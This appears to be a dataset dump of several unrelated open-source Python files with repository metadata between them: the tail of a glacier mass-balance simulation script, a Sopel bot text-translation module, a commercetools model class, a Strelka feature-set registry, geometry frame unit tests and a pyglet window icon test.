option_areaconstant=0, hindcast=input.hindcast,
debug=input.debug_mb, debug_refreeze=input.debug_refreeze))
if input.hindcast == 1:
glac_bin_temp = glac_bin_temp[:,::-1]
glac_bin_prec = glac_bin_prec[:,::-1]
glac_bin_acc = glac_bin_acc[:,::-1]
glac_bin_refreeze = glac_bin_refreeze[:,::-1]
glac_bin_snowpack = glac_bin_snowpack[:,::-1]
glac_bin_melt = glac_bin_melt[:,::-1]
glac_bin_frontalablation = glac_bin_frontalablation[:,::-1]
glac_bin_massbalclim = glac_bin_massbalclim[:,::-1]
glac_bin_massbalclim_annual = glac_bin_massbalclim_annual[:,::-1]
glac_bin_area_annual = glac_bin_area_annual[:,::-1]
glac_bin_icethickness_annual = glac_bin_icethickness_annual[:,::-1]
glac_bin_width_annual = glac_bin_width_annual[:,::-1]
glac_bin_surfacetype_annual = glac_bin_surfacetype_annual[:,::-1]
glac_wide_massbaltotal = glac_wide_massbaltotal[::-1]
glac_wide_runoff = glac_wide_runoff[::-1]
glac_wide_snowline = glac_wide_snowline[::-1]
glac_wide_snowpack = glac_wide_snowpack[::-1]
glac_wide_area_annual = glac_wide_area_annual[::-1]
glac_wide_volume_annual = glac_wide_volume_annual[::-1]
glac_wide_ELA_annual = glac_wide_ELA_annual[::-1]
offglac_wide_prec = offglac_wide_prec[::-1]
offglac_wide_refreeze = offglac_wide_refreeze[::-1]
offglac_wide_melt = offglac_wide_melt[::-1]
offglac_wide_snowpack = offglac_wide_snowpack[::-1]
offglac_wide_runoff = offglac_wide_runoff[::-1]
# # RECORD PARAMETERS TO DATASET
# if input.output_package == 2:
# (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
# glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
# glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual) = (
# convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc,
# glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
# glac_bin_frontalablation, glac_bin_massbalclim_annual,
# glac_bin_area_annual, glac_bin_icethickness_annual))
#
# if debug:
# # Compute glacier volume change for every time step and use this to compute mass balance
# # this will work for any indexing
# glac_wide_area = glac_wide_area_annual[:-1].repeat(12)
# # Mass change [km3 mwe]
# # mb [mwea] * (1 km / 1000 m) * area [km2]
# glac_wide_masschange = glac_wide_massbaltotal / 1000 * glac_wide_area
# # Mean annual mass balance [mwea]
# # note: used annual shape - 1 because area and volume have "n+1 years" t0 account for initial
# # and final
# mb_mwea = (glac_wide_masschange.sum() / glac_wide_area[0] * 1000 /
# (glac_wide_area_annual.shape[0]-1))
# print(' mb_model [mwea]:', mb_mwea.round(3))
#
# # Record output to xarray dataset
# output_temp_glac_monthly[:, n_iter] = glac_wide_temp
# output_prec_glac_monthly[:, n_iter] = glac_wide_prec
# output_acc_glac_monthly[:, n_iter] = glac_wide_acc
# output_refreeze_glac_monthly[:, n_iter] = glac_wide_refreeze
# output_melt_glac_monthly[:, n_iter] = glac_wide_melt
# output_frontalablation_glac_monthly[:, n_iter] = glac_wide_frontalablation
# output_massbaltotal_glac_monthly[:, n_iter] = glac_wide_massbaltotal
# output_runoff_glac_monthly[:, n_iter] = glac_wide_runoff
# output_snowline_glac_monthly[:, n_iter] = glac_wide_snowline
# output_area_glac_annual[:, n_iter] = glac_wide_area_annual
# output_volume_glac_annual[:, n_iter] = glac_wide_volume_annual
# output_ELA_glac_annual[:, n_iter] = glac_wide_ELA_annual
# output_offglac_prec_monthly[:, n_iter] = offglac_wide_prec
# output_offglac_refreeze_monthly[:, n_iter] = offglac_wide_refreeze
# output_offglac_melt_monthly[:, n_iter] = offglac_wide_melt
# output_offglac_snowpack_monthly[:, n_iter] = offglac_wide_snowpack
# output_offglac_runoff_monthly[:, n_iter] = offglac_wide_runoff
#
# if debug:
# print(' years:', glac_wide_volume_annual.shape[0]-1)
# print(' vol start/end:', np.round(glac_wide_volume_annual[0],2), '/',
# np.round(glac_wide_volume_annual[-1],2))
# print(' area start/end:', np.round(glac_wide_area_annual[0],2), '/',
# np.round(glac_wide_area_annual[-1],2))
# print(' volume:', glac_wide_volume_annual)
# # print('glac runoff max:', np.round(glac_wide_runoff.max(),0),
# # 'glac prec max:', np.round(glac_wide_prec.max(),2),
# # 'glac refr max:', np.round(glac_wide_refreeze.max(),2),
# # 'offglac ref max:', np.round(offglac_wide_refreeze.max(),2))
#
# # ===== Export Results =====
# rgi_table_ds = pd.DataFrame(np.zeros((1,glacier_rgi_table.shape[0])), columns=glacier_rgi_table.index)
# rgi_table_ds.iloc[0,:] = glacier_rgi_table.values
# output_ds_all_stats, encoding = create_xrdataset(rgi_table_ds, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats['temp_glac_monthly'].values[0,:,:] = calc_stats_array(output_temp_glac_monthly)
# output_ds_all_stats['prec_glac_monthly'].values[0,:,:] = calc_stats_array(output_prec_glac_monthly)
# output_ds_all_stats['acc_glac_monthly'].values[0,:,:] = calc_stats_array(output_acc_glac_monthly)
# output_ds_all_stats['refreeze_glac_monthly'].values[0,:,:] = calc_stats_array(output_refreeze_glac_monthly)
# output_ds_all_stats['melt_glac_monthly'].values[0,:,:] = calc_stats_array(output_melt_glac_monthly)
# output_ds_all_stats['frontalablation_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_frontalablation_glac_monthly))
# output_ds_all_stats['massbaltotal_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_massbaltotal_glac_monthly))
# output_ds_all_stats['runoff_glac_monthly'].values[0,:,:] = calc_stats_array(output_runoff_glac_monthly)
# output_ds_all_stats['snowline_glac_monthly'].values[0,:,:] = calc_stats_array(output_snowline_glac_monthly)
# output_ds_all_stats['area_glac_annual'].values[0,:,:] = calc_stats_array(output_area_glac_annual)
# output_ds_all_stats['volume_glac_annual'].values[0,:,:] = calc_stats_array(output_volume_glac_annual)
# output_ds_all_stats['ELA_glac_annual'].values[0,:,:] = calc_stats_array(output_ELA_glac_annual)
# output_ds_all_stats['offglac_prec_monthly'].values[0,:,:] = calc_stats_array(output_offglac_prec_monthly)
# output_ds_all_stats['offglac_melt_monthly'].values[0,:,:] = calc_stats_array(output_offglac_melt_monthly)
# output_ds_all_stats['offglac_refreeze_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_refreeze_monthly))
# output_ds_all_stats['offglac_snowpack_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_snowpack_monthly))
# output_ds_all_stats['offglac_runoff_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_runoff_monthly))
#
# # Export statistics to netcdf
# if input.output_package == 2:
# output_sim_fp = input.output_sim_fp + gcm_name + '/'
# if gcm_name not in ['ERA-Interim', 'ERA5', 'COAWST']:
# output_sim_fp += rcp_scenario + '/'
# # Create filepath if it does not exist
# if os.path.exists(output_sim_fp) == False:
# os.makedirs(output_sim_fp)
# # Netcdf filename
# if gcm_name in ['ERA-Interim', 'ERA5', 'COAWST']:
# # Filename
# netcdf_fn = (glacier_str + '_' + gcm_name + '_c' + str(input.option_calibration) + '_ba' +
# str(input.option_bias_adjustment) + '_' + str(sim_iters) + 'sets' + '_' +
# str(input.gcm_startyear) + '_' + str(input.gcm_endyear) + '.nc')
# else:
# netcdf_fn = (glacier_str + '_' + gcm_name + '_' + rcp_scenario + '_c' +
# str(input.option_calibration) + '_ba' + str(input.option_bias_adjustment) + '_' +
# str(sim_iters) + 'sets' + '_' + str(input.gcm_startyear) + '_' + str(input.gcm_endyear)
# + '.nc')
# if input.option_synthetic_sim==1:
# netcdf_fn = (netcdf_fn.split('--')[0] + '_T' + str(input.synthetic_temp_adjust) + '_P' +
# str(input.synthetic_prec_factor) + '--' + netcdf_fn.split('--')[1])
# # Export netcdf
# output_ds_all_stats.to_netcdf(output_sim_fp + netcdf_fn, encoding=encoding)
#
# # Close datasets
# output_ds_all_stats.close()
#
#
# if debug_spc:
# os.remove(debug_fp + debug_rgiid_fn)
# Global variables for Spyder development
if args.option_parallels == 0:
global main_vars
main_vars = inspect.currentframe().f_locals
#%% PARALLEL PROCESSING
if __name__ == '__main__':
time_start = time.time()
parser = getparser()
args = parser.parse_args()
if args.debug == 1:
debug = True
else:
debug = False
# RGI glacier number
if args.rgi_glac_number_fn is not None:
with open(args.rgi_glac_number_fn, 'rb') as f:
glac_no = pickle.load(f)
elif input.glac_no is not None:
glac_no = input.glac_no
else:
main_glac_rgi_all = modelsetup.selectglaciersrgitable(
rgi_regionsO1=input.rgi_regionsO1, rgi_regionsO2 =input.rgi_regionsO2,
rgi_glac_number=input.rgi_glac_number)
glac_no = list(main_glac_rgi_all['rgino_str'].values)
# Regions
regions_str = 'R'
for region in sorted(set([x.split('.')[0] for x in glac_no])):
regions_str += str(region)
# Number of cores for parallel processing
if args.option_parallels != 0:
num_cores = int(np.min([len(glac_no), args.num_simultaneous_processes]))
else:
num_cores = 1
# Glacier number lists to pass for parallel processing
glac_no_lsts = split_glaciers.split_list(glac_no, n=num_cores, option_ordered=args.option_ordered)
# Read GCM names from argument parser
gcm_name = args.gcm_list_fn
if args.gcm_name is not None:
gcm_list = [args.gcm_name]
rcp_scenario = args.rcp
elif args.gcm_list_fn == input.ref_gcm_name:
gcm_list = [input.ref_gcm_name]
rcp_scenario = args.rcp
else:
with open(args.gcm_list_fn, 'r') as gcm_fn:
gcm_list = gcm_fn.read().splitlines()
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
print('Found %d gcms to process'%(len(gcm_list)))
# Loop through all GCMs
for gcm_name in gcm_list:
if args.rcp is None:
print('Processing:', gcm_name)
else:
print('Processing:', gcm_name, rcp_scenario)
# Pack variables for multiprocessing
list_packed_vars = []
for count, glac_no_lst in enumerate(glac_no_lsts):
list_packed_vars.append([count, glac_no_lst, regions_str, gcm_name])
# Parallel processing
if args.option_parallels != 0:
print('Processing in parallel with ' + str(args.num_simultaneous_processes) + ' cores...')
with multiprocessing.Pool(args.num_simultaneous_processes) as p:
p.map(main,list_packed_vars)
# If not in parallel, then only should be one loop
else:
# Loop through the chunks and export bias adjustments
for n in range(len(list_packed_vars)):
main(list_packed_vars[n])
print('Total processing time:', time.time()-time_start, 's')
#%% ===== PLOTTING AND PROCESSING FOR MODEL DEVELOPMENT =====
# Place local variables in variable explorer
if args.option_parallels == 0:
main_vars_list = list(main_vars.keys())
gcm_name = main_vars['gcm_name']
main_glac_rgi = main_vars['main_glac_rgi']
# main_glac_hyps = main_vars['main_glac_hyps']
# main_glac_icethickness = main_vars['main_glac_icethickness']
# main_glac_width = main_vars['main_glac_width']
dates_table = main_vars['dates_table']
if input.option_synthetic_sim == 1:
dates_table_synthetic = main_vars['dates_table_synthetic']
gcm_temp_tile = main_vars['gcm_temp_tile']
gcm_prec_tile = main_vars['gcm_prec_tile']
gcm_lr_tile = main_vars['gcm_lr_tile']
gcm_temp = main_vars['gcm_temp']
gcm_tempstd = main_vars['gcm_tempstd']
gcm_prec = main_vars['gcm_prec']
gcm_elev = main_vars['gcm_elev']
gcm_lr = main_vars['gcm_lr']
gcm_temp_adj = main_vars['gcm_temp_adj']
gcm_prec_adj = main_vars['gcm_prec_adj']
gcm_elev_adj = main_vars['gcm_elev_adj']
gcm_temp_lrglac = main_vars['gcm_lr']
# output_ds_all_stats = main_vars['output_ds_all_stats']
# modelparameters = main_vars['modelparameters']
glacier_rgi_table = main_vars['glacier_rgi_table']
glacier_str = main_vars['glacier_str']
glac_oggm_df = main_vars['glac_oggm_df']
glacier_gcm_temp = main_vars['glacier_gcm_temp']
glacier_gcm_tempstd = main_vars['glacier_gcm_tempstd']
glacier_gcm_prec = main_vars['glacier_gcm_prec']
glacier_gcm_elev = main_vars['glacier_gcm_elev']
glacier_gcm_lrgcm = main_vars['glacier_gcm_lrgcm']
glacier_gcm_lrglac = glacier_gcm_lrgcm
glacier_area_initial = main_vars['glacier_area_initial']
icethickness_initial = main_vars['icethickness_initial']
width_initial = main_vars['width_initial']
elev_bins = main_vars['elev_bins']
glac_bin_frontalablation = main_vars['glac_bin_frontalablation']
glac_bin_area_annual = main_vars['glac_bin_area_annual']
glac_bin_massbalclim_annual = main_vars['glac_bin_massbalclim_annual']
glac_bin_melt = main_vars['glac_bin_melt']
glac_bin_acc = main_vars['glac_bin_acc']
glac_bin_refreeze = main_vars['glac_bin_refreeze']
glac_bin_snowpack = main_vars['glac_bin_snowpack']
glac_bin_temp = main_vars['glac_bin_temp']
glac_bin_prec = main_vars['glac_bin_prec']
glac_bin_massbalclim = main_vars['glac_bin_massbalclim']
glac_wide_massbaltotal = main_vars['glac_wide_massbaltotal']
glac_wide_area_annual = main_vars['glac_wide_area_annual']
glac_wide_volume_annual = main_vars['glac_wide_volume_annual']
glac_wide_runoff = main_vars['glac_wide_runoff']
# glac_wide_prec = main_vars['glac_wide_prec']
# glac_wide_refreeze = main_vars['glac_wide_refreeze']
modelparameters_all = main_vars['modelparameters_all']
sim_iters = main_vars['sim_iters']
| 0 | 0 | 0 |
90b763967161ada45c58e7d2a7c5158c9e848ee0 | 6,276 | py | Python | sopel_modules/SpiceBot/Translate.py | deathbybandaid/Sopel-SpiceBotSERV | 816dddc88943b9194f3f0aa6558759eedd585343 | [
"EFL-2.0"
] | 2 | 2018-07-24T14:04:36.000Z | 2019-01-11T21:41:50.000Z | sopel_modules/SpiceBot/Translate.py | deathbybandaid/Sopel-SpiceBotSERV | 816dddc88943b9194f3f0aa6558759eedd585343 | [
"EFL-2.0"
] | 947 | 2018-07-24T01:50:29.000Z | 2019-04-14T22:40:57.000Z | sopel_modules/SpiceBot/Translate.py | deathbybandaid/Sopel-SpiceBotSERV | 816dddc88943b9194f3f0aa6558759eedd585343 | [
"EFL-2.0"
] | 6 | 2019-04-12T17:09:07.000Z | 2019-09-30T05:56:15.000Z | # coding=utf8
from __future__ import unicode_literals, absolute_import, division, print_function
from sopel_modules.spicemanip import spicemanip
import re
from num2words import num2words
translate = Translate()
| 32.020408 | 155 | 0.497291 | # coding=utf8
from __future__ import unicode_literals, absolute_import, division, print_function
from sopel_modules.spicemanip import spicemanip
import re
from num2words import num2words
class Translate():
    """Collection of small text "translation" helpers used by the bot
    (pig latin, ERMAHGERD speak, binary conversion, masking, ...).

    Effectively stateless apart from ``self.dict``, which is kept only for
    backwards compatibility with older callers.
    """

    def __init__(self):
        # Scratch dictionary kept for compatibility; no helper below uses it.
        self.dict = {}

    def bot_translate_process(self, totranslate, translationtypes):
        """Apply each named translation in *translationtypes* to *totranslate*.

        :param totranslate: the text (string or list of words) to transform
        :param translationtypes: one translation name or a list of names;
            unrecognised names are silently ignored
        :return: the transformed text
        """
        # Accept a single name as well as a list of names.
        if not isinstance(translationtypes, list):
            translationtypes = [translationtypes]
        for translationtype in translationtypes:
            if translationtype == "hyphen":
                totranslate = spicemanip(totranslate, 0).replace(' ', '-')
            elif translationtype == "underscore":
                totranslate = spicemanip(totranslate, 0).replace(' ', '_')
            elif translationtype == "ermahgerd":
                totranslate = self.trernslert(totranslate)
            elif translationtype == "obscure":
                totranslate = self.text_obscure(totranslate)
            elif translationtype == "piglatin":
                totranslate = self.text_piglatin(totranslate)
            elif translationtype == "binaryinvert":
                totranslate = self.text_binary_swap(totranslate)
            elif translationtype == "onetozero":
                totranslate = self.text_one_to_zero_swap(totranslate)
            elif translationtype == "upper":
                totranslate = spicemanip(totranslate, 0).upper()
            elif translationtype == "lower":
                totranslate = spicemanip(totranslate, 0).lower()
        return totranslate

    def text_obscure(self, words):
        """Return a mask of asterisks with the same length as *words*."""
        return "*" * len(words)

    def text_piglatin(self, words):
        """Translate each word into pig latin and return the joined result."""
        if not isinstance(words, list):
            words = [words]
        rebuildarray = []
        for word in words:
            word = word.lower()
            first = word[:1]
            # Vowel-initial words just get the "ay" suffix; otherwise the
            # leading consonant moves to the end first.
            if first in ('a', 'e', 'i', 'o', 'u'):
                rebuildarray.append(word + 'ay')
            else:
                rebuildarray.append(word[1:] + first + 'ay')
        return spicemanip(rebuildarray, 0)

    def trernslert(self, werds):
        """Translate a sentence into ERMAHGERD speak.

        Commas, parentheses and percent signs are stripped from each token
        before translation and restored (percent becomes "PERCERNT") after.
        Note: the result carries a leading space, matching historic output.
        """
        terkerns = werds.split()
        er = ''
        for terk in terkerns:
            # Remember which punctuation to restore, then strip it.
            cermmer = terk.endswith(',')
            if cermmer:
                terk = re.sub(r"[,]+", '', terk)
            lerftperernthersers = terk.startswith('(')
            if lerftperernthersers:
                terk = re.sub(r"[(]+", '', terk)
            rerghtperernthersers = terk.endswith(')')
            if rerghtperernthersers:
                terk = re.sub(r"[)]+", '', terk)
            percernt = terk.endswith('%')
            if percernt:
                terk = re.sub(r"[%]+", '', terk)
            werd = self.ermergerd(terk)
            if lerftperernthersers:
                werd = '(' + werd
            if percernt:
                werd = werd + ' PERCERNT'
            if rerghtperernthersers:
                werd = werd + ')'
            if cermmer:
                werd = werd + ','
            er = er + ' ' + werd
        return er

    def ermergerd(self, w):
        """Translate a single word into ERMAHGERD speak (uppercased)."""
        w = w.strip().lower()
        # Fixed translations that the generic vowel rules get wrong.
        derctshernerer = {'me': 'meh', 'you': 'u', 'are': 'er', "you're": "yer", "i'm": "erm", "i've": "erv", "my": "mah", "the": "da", "omg": "ermahgerd"}
        if w in derctshernerer:
            return derctshernerer[w].upper()
        w = re.sub(r"[\.,/;:!@#$%^&*\?)(]+", '', w)
        # NOTE(review): assumes w is non-empty after punctuation stripping,
        # otherwise w[0] raises IndexError (same as the original code).
        if w[0].isdigit():
            # Spell numbers out so they can be translated too.
            w = num2words(int(w))
        w = re.sub(r"tion", "shun", w)
        pat = r"[aeiouy]+"
        # Replace every vowel run with "er", with special cases for words
        # starting with 'y' and endings in silent 'e' or '-ing'.
        er = re.sub(pat, "er", w)
        if w.startswith('y'):
            er = 'y' + re.sub(pat, "er", w[1:])
        if w.endswith('e') and not w.endswith('ee') and len(w) > 3:
            er = re.sub(pat, "er", w[:-1])
        if w.endswith('ing'):
            er = re.sub(pat, "er", w[:-3]) + 'in'
        er = er[0] + er[1:].replace('y', 'er')
        er = er.replace('rr', 'r')
        return er.upper()

    def text_one_to_zero_swap(self, words):
        """Invert the bits of each word; non-binary words are first converted
        to their binary representation."""
        if not words:
            return "No input provided"
        if not isinstance(words, list):
            words = [words]
        words = spicemanip(words, 0).split(" ")
        outputarray = []
        for word in words:
            if not self.isitbinary(word):
                word = self.text_binary_swap(word)
            # Swap through a temporary digit so 1->0 and 0->1 don't collide.
            word = str(word).replace('1', '2')
            word = str(word).replace('0', '1')
            word = str(word).replace('2', '0')
            outputarray.append(str(word))
        return spicemanip(outputarray, 0)

    def text_binary_swap(self, words):
        """Convert text words to binary strings and binary words back to text."""
        if not words:
            return "No input provided"
        if not isinstance(words, list):
            words = [words]
        words = spicemanip(words, 0).split(" ")
        outputarray = []
        for word in words:
            if self.isitbinary(word):
                word = self.bits2string(word) or 'error'
            else:
                word = self.string2bits(word) or 1
            word = spicemanip(word, 0)
            outputarray.append(str(word))
        return spicemanip(outputarray, 0)

    @staticmethod
    def unicode_string_cleanup(string):
        """Replace common "smart" unicode punctuation with ASCII equivalents.

        Declared as a staticmethod: the original definition lacked ``self``
        and therefore broke when called on a Translate instance. staticmethod
        keeps both ``translate.unicode_string_cleanup(s)`` and
        ``Translate.unicode_string_cleanup(s)`` working.
        """
        for r in (("\u2013", "-"), ("\u2019", "'"), ("\u2026", "...")):
            string = string.replace(*r)
        return string

    def isitbinary(self, string):
        """Return True when *string* is non-empty and contains only 0s/1s."""
        return bool(string) and set(string) <= {'0', '1'}

    def string2bits(self, s=''):
        """Return a list of 8-bit binary strings, one per character of *s*."""
        return [bin(ord(x))[2:].zfill(8) for x in s]

    def bits2string(self, b=None):
        """Decode concatenated 8-bit binary groups back into text."""
        return ''.join(chr(int(b[i*8:i*8+8], 2)) for i in range(len(b)//8))
translate = Translate()
| 5,716 | -3 | 347 |
f12e3008a4319a15eacceb3b37eb991f2dfc9a15 | 1,108 | py | Python | models/type.py | DevgurusSupport/commercetools-python-sdk | 849c4cc182b68850fedc1f67a594449c28a4f751 | [
"MIT"
] | null | null | null | models/type.py | DevgurusSupport/commercetools-python-sdk | 849c4cc182b68850fedc1f67a594449c28a4f751 | [
"MIT"
] | null | null | null | models/type.py | DevgurusSupport/commercetools-python-sdk | 849c4cc182b68850fedc1f67a594449c28a4f751 | [
"MIT"
] | null | null | null | from .basemodel import BaseModel
from .types.field_definition import FieldDefinition
from typing import List, Dict
| 36.933333 | 178 | 0.643502 | from .basemodel import BaseModel
from .types.field_definition import FieldDefinition
from typing import List, Dict
class Type(BaseModel):
key: str
name: Dict
description: Dict
resourceTypeIds: List[str]
fieldDefinitions: List[FieldDefinition]
def __init__(self, key: str = None, name: Dict = None, description: Dict = None, resourceTypeIds: List[str] = None, fieldDefinitions: List[FieldDefinition] = None, **kwargs):
super().__init__(**kwargs)
self.key = key
self.name = name
self.description = description
self.resourceTypeIds = resourceTypeIds
if fieldDefinitions is not None:
_fieldDefinitions = []
for fieldDefinition in fieldDefinitions:
if isinstance(fieldDefinition, dict):
_fieldDefinitions.append(
FieldDefinition(**fieldDefinition))
else:
_fieldDefinitions.append(fieldDefinition)
self.fieldDefinitions = _fieldDefinitions
else:
self.fieldDefinitions = fieldDefinitions
| 816 | 153 | 23 |
7e168a33fd90d6bac2118972d179f010ae072f3f | 1,688 | py | Python | scripts/strelka-2.9.2.centos6_x86_64/share/scoringModelTraining/somatic/lib/evs/features/__init__.py | dongxuemin666/RNA-combine | 13e178aae585e16a9a8eda8151d0f34316de0475 | [
"Apache-2.0"
] | 7 | 2021-09-03T09:11:00.000Z | 2022-02-14T15:02:12.000Z | scripts/strelka-2.9.2.centos6_x86_64/share/scoringModelTraining/somatic/lib/evs/features/__init__.py | dongxuemin666/RNA-combine | 13e178aae585e16a9a8eda8151d0f34316de0475 | [
"Apache-2.0"
] | null | null | null | scripts/strelka-2.9.2.centos6_x86_64/share/scoringModelTraining/somatic/lib/evs/features/__init__.py | dongxuemin666/RNA-combine | 13e178aae585e16a9a8eda8151d0f34316de0475 | [
"Apache-2.0"
] | 2 | 2022-01-10T13:07:29.000Z | 2022-01-11T22:14:11.000Z | #
# Strelka - Small Variant Caller
# Copyright (c) 2009-2018 Illumina, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
import abc
class FeatureSet(object):
""" VCF paired Feature set for somatic comparison """
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def collect(self, vcfname):
""" Return a data frame with features collected from
the given VCF, tagged by given type """
pass
@abc.abstractmethod
def trainingfeatures(self):
""" Return a list of columns that are features to use for EVS model training """
pass
sets = {}
@staticmethod
@staticmethod
import SomaticSNV # noqa
import SomaticIndel # noqa
import PosAndAlleles # noqa
| 27.225806 | 88 | 0.673578 | #
# Strelka - Small Variant Caller
# Copyright (c) 2009-2018 Illumina, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
import abc
class FeatureSet(object):
    """ VCF paired Feature set for somatic comparison """
    __metaclass__ = abc.ABCMeta

    def __init__(self):
        pass

    @abc.abstractmethod
    def collect(self, vcfname):
        """ Return a data frame with features collected from
            the given VCF, tagged by given type """
        pass

    @abc.abstractmethod
    def trainingfeatures(self):
        """ Return a list of columns that are features to use for EVS model training """
        pass

    # Registry of feature-set implementations, keyed by name.
    sets = {}

    @staticmethod
    def register(name, xclass=None):
        """ Register *xclass* in the feature-set registry under *name*.

        Usable either directly (``FeatureSet.register("x", Cls)``) or as a
        class decorator (``@FeatureSet.register("x")``).  Both forms return
        the registered class.  BUGFIX: the decorator form previously
        returned an inner function that returned None, which replaced the
        decorated class binding in its module with None. """
        if xclass is None:
            def fn(xclass2):
                FeatureSet.sets[name] = xclass2
                # Return the class so the decorator preserves the binding.
                return xclass2
            return fn
        else:
            FeatureSet.sets[name] = xclass
            return xclass

    @staticmethod
    def make(name):
        """ Instantiate and return the feature set registered under *name*. """
        # noinspection PyCallingNonCallable
        return FeatureSet.sets[name]()
import SomaticSNV # noqa
import SomaticIndel # noqa
import PosAndAlleles # noqa
| 282 | 0 | 79 |
c98f6322ac2340652aaaf45eb747da841ba74e6d | 2,815 | py | Python | simulation/utils/geometry/test/test_frame.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | 13 | 2020-06-30T17:18:28.000Z | 2021-07-20T16:55:35.000Z | simulation/utils/geometry/test/test_frame.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | 1 | 2020-11-10T20:15:42.000Z | 2020-12-25T18:27:56.000Z | simulation/utils/geometry/test/test_frame.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | 3 | 2020-07-20T09:09:08.000Z | 2021-07-20T17:00:37.000Z | import math
import unittest
from simulation.utils.geometry.frame import Frame, validate_and_maintain_frames
from simulation.utils.geometry.transform import Transform
from simulation.utils.geometry.vector import Vector
if __name__ == "__main__":
unittest.main()
| 31.988636 | 83 | 0.630906 | import math
import unittest
from simulation.utils.geometry.frame import Frame, validate_and_maintain_frames
from simulation.utils.geometry.transform import Transform
from simulation.utils.geometry.vector import Vector
class ModuleTest(unittest.TestCase):
    """Unit tests for Frame connections, frame transformations and the
    validate_and_maintain_frames decorator."""
    def test_connecting_frames(self):
        """Test if frames can be connected."""
        frame_1 = Frame("frame_1")
        frame_2 = Frame("frame_2")
        frame_3 = Frame("frame_3")
        # Build a chain frame_1 -> frame_2 -> frame_3 plus a direct
        # frame_1 -> frame_3 connection; none of these should raise.
        frame_1.connect_to(
            frame_2, transformation_to_frame=Transform([0, 0], math.radians(90))
        )
        frame_2.connect_to(
            frame_3, transformation_to_frame=Transform([0, 0], math.radians(-90))
        )
        frame_1.connect_to(
            frame_3, transformation_to_frame=Transform([0, 0], math.radians(-90))
        )
    def test_transformations(self):
        """Test if frame transformations work as expected.
        Note: This is only tested for vectors because the behavior must be the same
        for all classes that are transformable.
        """
        frame_1 = Frame("frame_1")
        frame_2 = Frame("frame_2")
        frame_1.connect_to(
            frame_2, transformation_to_frame=Transform([0, 0], math.radians(90))
        )
        vec_frame_1 = Vector(1, 0, 0, frame=frame_1)
        # The 90 degree rotation maps the x unit vector onto the y unit vector.
        vec_frame_2 = frame_2(vec_frame_1)
        self.assertEqual(vec_frame_2, Vector(0, 1, 0, frame=frame_2))
        # Transforming a vector into the frame it is already in is a no-op.
        vec_frame_2 = frame_2(vec_frame_2)
        self.assertEqual(vec_frame_2, Vector(0, 1, 0, frame=frame_2))
    def test_frame_decorator(self):
        """Test if frames are correctly checked and propagated by decorator."""
        frame_1 = Frame("frame_1")
        frame_2 = Frame("frame_2")
        # Minimal stand-in for any object carrying a ``_frame`` attribute.
        class Framed:
            def __init__(self, frame):
                self._frame = frame
        @validate_and_maintain_frames
        def test_func(*args, **kwargs):
            return kwargs["result"]
        # Test case 1:
        # Two objects, same frame
        args = (Framed(frame_1), Framed(frame_1))
        result = test_func(*args, result=Framed(None))
        self.assertEqual(result._frame, frame_1)
        # Test case 2:
        # Two objects, only one has a frame
        # Result should still have a frame
        args = (Framed(frame_1), Framed(None))
        result = test_func(*args, result=Framed(None))
        self.assertEqual(result._frame, frame_1)
        args = (Framed(None), Framed(frame_2))
        result = test_func(*args, result=Framed(None))
        self.assertEqual(result._frame, frame_2)
        # Test case 3:
        # Objects have different frames
        args = (Framed(frame_1), Framed(frame_2))
        with self.assertRaises(ValueError):
            result = test_func(*args, result=Framed(None))
if __name__ == "__main__":
unittest.main()
| 87 | 2,436 | 23 |
bdeac31fc404c7ca4aa58750eff8f810ef925d2f | 990 | py | Python | tests/window/WINDOW_SET_ICON.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | 1 | 2016-07-19T16:56:46.000Z | 2016-07-19T16:56:46.000Z | tests/window/WINDOW_SET_ICON.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | 1 | 2018-08-27T22:31:16.000Z | 2018-08-27T22:31:16.000Z | tests/window/WINDOW_SET_ICON.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | 1 | 2019-09-06T03:05:35.000Z | 2019-09-06T03:05:35.000Z | #!/usr/bin/env python
'''Test that window icon can be set.
Expected behaviour:
One window will be opened. It will have an icon depicting a yellow
"A".
Close the window or press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: WINDOW_SET_MOUSE_CURSOR.py 717 2007-03-03 07:04:10Z Alex.Holkner $'
import unittest
from pyglet.gl import *
from pyglet import image
from pyglet import window
from pyglet.window import key
from os.path import join, dirname
icon_file = join(dirname(__file__), 'icon1.png')
